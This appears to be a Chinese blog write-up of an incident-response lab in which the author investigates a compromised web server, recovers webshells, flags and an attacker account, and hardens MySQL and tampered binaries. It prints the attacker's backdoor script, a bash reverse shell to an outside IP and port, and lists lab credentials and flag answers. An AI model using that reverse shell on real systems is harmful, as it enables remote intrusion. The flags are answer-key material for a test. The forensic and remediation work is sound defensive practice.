靶机渗透-应急加固1 | 风尘孤狼
0%

靶机渗透-应急加固1

image-20240225113557187

服务器:139.196.218.29 账号:root 密码:qgQFmTaZrLERjtRaDnGP…

js劫持

获取js劫持域名(带https)

这个跳转的域名就是答案https://www.194nb.com

黑客首次webshell 密码

黑客首次webshell 密码,不加flag{}

image-20240225105545311
QjsvWsp6L84Vl9dRTTytVyn5xNr1

黑客首次入侵方式

黑客首次攻击(非有效攻击)通过什么方式(如:文件上传、SQL注入、命令执行)

因为首个马在uploads文件夹下,猜测就是文件上传漏洞,但是不对,去看一下日志

image-20240225110136762
xss

黑客服务器的信息

请找到黑客留下的后门中黑客服务器的ip及端口

查看进程发现存在可疑1.sh

image-20240225110319495

访问发现是反弹的shell

root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/log/nginx# cat /var/www/html/runtime/cache/1.sh
#!/bin/bash
bash -i >& /dev/tcp/49.232.241.253/8888 0>&1
49.232.241.253:8888

黑客的webshell2

提交黑客上传的第二个webshell内的flag

这里因为日志太多,一点一点翻很浪费时间,用自动分析日志的工具LogForensics.pl即可【在linux里面用】

web日志取证分析工具 - 实验室 - 腾讯安全应急响应中心 (tencent.com)

https://strawberryperl.com/

使用方法:

Perl LogForensics.pl -file logfile -websvr (nginx|httpd) [-ip ip(ip,ip,ip)|-url url(url,url,url)]

File:日志文件路径 
Websvr : 日志类型
Ip: 起始调查IP或ip列表,以逗号分割
url: 起始调查cgi 链接或链接列表,以逗号分割
usage:
        LogForensics.pl -file logfile -websvr (nginx|httpd) [-ip ip(ip,ip,ip)|-url url(url,url,url)]
        root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/log/nginx# ./LogForensics.pl -file ./access.log -websvr nginx
                        Web log forensics
                        ver2014102301 by xti9er
[*] ip=NULL      url=NULL
[*] PRELOAD ./access.log Plz wait
[*] LOAD ./access.log.db
[!] ip + 59 & url + 6 and go on
[*] Export report... Plz wait
[*] All Done in 2 s , ip[1] url[6]
image-20240225111446492

1.php就是第二个马

image-20240225111603370

flag{5t945bbwxokj87f1ucjb2vc7zdnf8ix3}

mysql

修复mysql可getshell漏洞

先得连上数据库,找配置文件,这种可以先全局搜一下database.php,config.php等等关键词文件

/var/www/html/application/database.php
image-20240225111744782

回收用户file权限并且关闭全局日志

revoke file on *.* from 'root'@'localhost';
set global general_log = off;
flush privileges;

黑客的账号

找到黑客添加的账号并删除

image-20240225112246820

aman删除

userdel aman

黑客篡改的命令1

修复黑客篡改的命令并且删除篡改命令生成的免杀马

image-20240225112429608 image-20240225112446256

删除替换

rm ps 
mv ps_ ps
rm ls 
mv ls2 ls
rm /var/www/html/public/static/img/1.php

修复JS劫持

修复JS劫持

最慢的当然就是一点一点找了,或者用find命令

root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# find . | xargs grep -ri '<script type="text/javascript">' -l | sort | uniq -c
      6 ./application/home/view/public/js.html
      4 ./runtime/temp/7989650828d8c92a2cbbbcbe7c322c03.php
      4 ./runtime/temp/ba0546f2ed29bcb24fbace34b295ef45.php
      4 ./thinkphp/tpl/dispatch_jump.tpl
      4 ./thinkphp/tpl/page_trace.tpl

删除俩马和恶意代码即可修复

root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# rm ./runtime/temp/ba0546f2ed29bcb24fbace34b295ef45.php
root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# rm ./runtime/temp/7989650828d8c92a2cbbbcbe7c322c03.php
制作不易,如若感觉写的不错,欢迎打赏